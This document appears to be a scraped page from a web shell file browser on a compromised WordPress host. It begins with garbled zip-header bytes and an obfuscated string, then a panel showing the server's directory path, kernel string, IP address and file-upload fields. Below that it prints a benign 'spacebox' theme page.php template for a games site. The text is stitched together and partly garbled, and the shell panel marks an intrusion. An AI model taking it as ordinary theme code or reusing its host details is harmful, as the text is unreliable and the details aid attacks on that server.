PK œqhYî¶J‚ßFßF)nhhjz3kjnjjwmknjzzqznjzmm1kzmjrmz4qmm.itm/*\U8ewW087XJD%onwUMbJa]Y2zT?AoLMavr%5P*/ $#$#$#

Dir : /home/trave494/newexitinggames.kerihosting.com/wp-content/themes/spacebox/
Server: Linux ngx353.inmotionhosting.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64
IP: 209.182.202.254
Choose File :

Url:
Dir : /home/trave494/newexitinggames.kerihosting.com/wp-content/themes/spacebox/page.php

<?php get_header(); ?>

<div id="content" class="content<?php echo get_option('spacebox_sidebar_position'); ?>">  

  <?php
  // Do some action before the page output
  do_action('spacebox_before_page');
  
  
  if (have_posts()) :
    while (have_posts()) : the_post(); 
      ?>
      <div class="singlepage inner" id="post-<?php the_ID(); ?>">
        <!--<div class="title">
          <h2>
            <a href="<?php the_permalink() ?>" rel="bookmark" title="Permanent Link to <?php the_title(); ?>">
              <?php the_title(); ?>
            </a>
          </h2>
        </div> -->
        
        <div class="cover">
          <div class="entry">
            <?php the_content(__('Read more..', 'fungames')); ?>
            <div class="clear"></div>
          </div>
        </div>
      </div>
      <?php 
    endwhile;
    
    // Do some action after the page output
    do_action('spacebox_after_page');    
    
  else : 
    ?>
    <h2 class="pagetitle">
      <?php _e("Sorry, Can't find that Game. But maybe you like one of these games:", "fungames"); ?>
    </h2>
    
    <?php
    // Get some random games
    get_template_part('games', 'random');
    
  endif; 

  // Do some actions before the content wrap ends
  do_action('spacebox_before_content_end'); 
  ?>  

</div> <?php // end content ?>


<?php get_footer(); ?>